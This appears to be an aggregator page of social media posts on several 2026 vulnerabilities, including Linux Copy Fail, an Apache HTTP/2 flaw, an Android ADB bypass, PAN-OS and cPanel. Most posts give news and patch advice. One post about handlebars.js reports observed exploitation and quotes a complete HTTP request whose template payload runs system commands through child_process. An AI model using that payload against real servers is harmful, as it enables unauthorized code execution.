Overview
Description
Statistics
- 22 Posts
- 45 Interactions
Fediverse
A very good summary of the CopyFail flaw affecting the Linux kernel: history of the flaw, exploitation mechanism, erratic handling of the disclosure, mitigation - by Linuxtricks #Infosec #Linux https://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/
Oh hey, RHEL released patches for Copy Fail!
#OpenShift hosters 🔊 Red Hat has released a blocker for the copy-fail vulnerability, no reboots needed:
CVE-2026-31431 #CopyFail shows that #LLM-assisted #cybersecurity research is:
1. Already there and massively impactful without #mythos.
2. Digestible by current governance systems of responsible disclosure.
3. Way more realistic than agents discovering, deploying and scaling exploits autonomously.
Details: https://xint.io/blog/copy-fail-linux-distributions
🚨ATTENTION: a bug in #linux has been hidden in the system for 9 years; it is called Copy Fail, is associated with CVE-2026-31431, and affects a critical part of the #kernel related to algif_aead, the cryptographic interface used to move data between user space and the kernel.
In short, a Linux bug hidden for 9 years can allow an unprivileged user to escalate to root in seconds.
The video here explains what this vulnerability is about.👇 https://www.youtube.com/watch?v=R7_Jrm7zY-0
About CVE-31431 "Copy Fail":
I wrote something up on GitHub: https://github.com/darioomatos/cve-2026-31431-copyfail
Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years
https://unit42.paloaltonetworks.com/cve-2026-31431-copy-fail/
Read on HackerWorkspace: https://hackerworkspace.com/article/copy-fail-what-you-need-to-know-about-the-most-severe-linux-threat-in-years
Watch out for this flaw affecting Linux systems... https://www.adslzone.net/noticias/seguridad/vulnerabilidad-copy-fail-linux-cve-2026-31431/
I just came across another article that was also published yesterday on #podman rootless containers and #copyfail. This one takes a closer look at the exploit itself and how the kernel handles the attempt to escalate privileges. It also draws a similar conclusion regarding the role of user namespaces in limiting exposure in rootless mode.
Great read! https://www.dragonsreach.it/2026/05/04/cve-2026-31431-copy-fail-rootless-containers/
📢 How to check for and mitigate the Copy Fail vulnerability (CVE-2026-31431) on GNU/Linux
Find out whether your GNU/Linux system is vulnerable to Copy Fail (CVE-2026-31431) and learn how to apply the fix correctly.
Presenting, for absolutely no reason at all, CVE-2026-31431 as a 587-byte x86_64 static ELF:
https://github.com/Rat5ak/CVE-2026-31431-CopyFail-static-ELF--POC
Copy.fail: a small Linux kernel bug with an unusually big blast radius https://jorijn.com/en/blog/copy-fail-cve-2026-31431-linux-kernel-bug-explained/
A well-documented analysis of this flaw, which is quite complex and based on a combination of bad behaviours in the kernel https://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/ #linux #sécurité #faille #analyse
Bluesky
Overview
- Apache Software Foundation
- Apache HTTP Server
Description
Statistics
- 11 Posts
- 32 Interactions
Fediverse
"That 'responsible disclosure' Thing"
A post with the details of CVE-2026-23918, the double free vulnerability fixed in Apache httpd 2.4.67.
#apache
https://eissing.org/icing/posts/responsible-disclosure/
@tychotithonus I just love the Debian security tracker, they manage the flood so good https://security-tracker.debian.org/tracker/CVE-2026-23918
Apache flaw: two simple frames are enough to cause a denial of service (CVE-2026-23918) https://www.it-connect.fr/faille-apache-deux-simples-trames-suffisent-a-faire-un-deni-de-service-cve-2026-23918/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #Apache
#Apache HTTP Server Vulnerability CVE-2026-23918 Exposes Millions of Servers to Remote Code Execution Attacks.
Anyone running Apache httpd version 2.4.66 or earlier is strongly urged to upgrade immediately!
👇
https://gbhackers.com/apache-http-server-vulnerability-exposes-millions-rce/
Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE
https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html
Read on HackerWorkspace: https://hackerworkspace.com/article/critical-apache-http-2-flaw-cve-2026-23918-enables-dos-and-potential-rce
Summary of all Apache vulnerabilities: https://www.hackerworkspace.com/article/apache-http-server-2-4-vulnerabilities-the-apache-http-server-project
These are turning out to be a complicated few days for many... 🫠
https://support.cpanel.net/hc/en-us/articles/40229402602519-Security-CVE-2026-23918
Bluesky
Overview
Description
Statistics
- 10 Posts
- 22 Interactions
Fediverse
Update your Android now: this flaw allows your phone to be attacked without you tapping anything 👇
https://www.adslzone.net/noticias/moviles/parche-seguridad-android-vulnerabilidad-cve-2026-0073/
#Ciberseguridad #Seguridad #Privacidad 🔏
OpenSSL's "0 means fail and 1 means success and oh yeah -1 also means fail" APIs have been causing bugs for decades.
https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/
Today we are disclosing CVE-2026-0073:
A critical no-interaction proximal/adjacent remote code execution vulnerability in adbd's ADB-over-TCP authentication path.
Full technical write-up + exploit flow:
https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/
Barghest Research Group found a critical no-interaction remote RCE in Android's Wireless Debugging ADB functionality.
https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/
CVE-2026-0073 affects Android’s System component and it can be exploited without any user interaction. https://www.securityweek.com/critical-remote-code-execution-vulnerability-patched-in-android-2/
The importance of security updates for the operating systems on mobile phones, which are really small computers ⚠️ 📱 👾
Update your Android now: this flaw allows your phone to be attacked without you tapping anything
https://www.adslzone.net/noticias/moviles/parche-seguridad-android-vulnerabilidad-cve-2026-0073/
CVE-2026-0073 Android adbd TLS client-authentication bypass
https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/
Read on HackerWorkspace: https://hackerworkspace.com/article/cve-2026-0073-android-adbd-tls-client-authentication-bypass
Bluesky
Overview
Description
Statistics
- 11 Posts
- 5 Interactions
Fediverse
...sigh...
<insert HereWeGoAgain.gif meme>
~~~~~~~~~~~
Urgent Palo Alto Networks Security Advisory - Severity 9.3 · CRITICAL
Palo Alto Networks has published one new Security Advisory for a Critical Unauthenticated User initiated Buffer Overflow Vulnerability in User-ID™ Authentication Portal. This is available at https://security.paloaltonetworks.com/CVE-2026-0300
We strongly advise PAN-OS customers to read the advisory and take appropriate action immediately to protect their devices.
#PaloAlto PAN-OS Vulnerability CVE-2026-0300 Under Active Exploitation - Enables Remote Code Execution (#RCE) - CVSS 9.3 no patch released yet, but expected soon!
👇
https://thehackernews.com/2026/05/palo-alto-pan-os-flaw-under-active.html
Bluesky
Overview
Description
Statistics
- 6 Posts
- 1 Interaction
Fediverse
More than 40,000 servers compromised through a zero-day flaw in cPanel. The vulnerability CVE-2026-41940 gives attackers admin access without authentication. #cPanel #Sicherheitslücke https://winfuture.de/news,158509.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia
Bluesky
Overview
Description
Statistics
- 4 Posts
- 4 Interactions
Bluesky
Overview
- MetInfo CMS
- MetInfo CMS
Description
Statistics
- 4 Posts
Fediverse
📰 Critical MetInfo CMS Vulnerability Under Active Exploitation
🚨 ACTIVE EXPLOITATION! A critical RCE flaw (CVE-2026-29014, CVSS 9.8) in MetInfo CMS is being widely exploited. Unauthenticated attackers can gain full server control. Patch immediately! #CVE #RCE #CyberSecurity #Vulnerability
Bluesky
Overview
- handlebars-lang
- handlebars.js
Description
Statistics
- 2 Posts
Fediverse
Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937
Here is a full request:
POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1
{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}
Overview
- Weaver Network Co., Ltd.
- E-cology
Description
Statistics
- 2 Posts
Fediverse
CVE‑2026‑22679 is a critical unauthenticated RCE in Weaver E‑cology 10.0 exploited within five days of patch release. Attackers abused an exposed debug API endpoint to execute system commands. No workaround exists — upgrade to build 20260312 immediately. #CyberSecurity #RCE #ZeroTrust
Overview
Description
Statistics
- 1 Post
- 6 Interactions
Fediverse
Kaspersky researchers just found and presented a Snapdragon 410/210/617 bootrom exploit - CVE-2026-25262 in this month’s Qualcomm security bulletin.
It’s well known that every forensics tool supported exploiting those SoCs from the bootrom, but for 9 years, nobody knew how they were doing it.
This is some amazing research that finally solves the mystery.
I’m sure the BananaHackers community of Snapdragon 210 flip phone modders will find a use for this.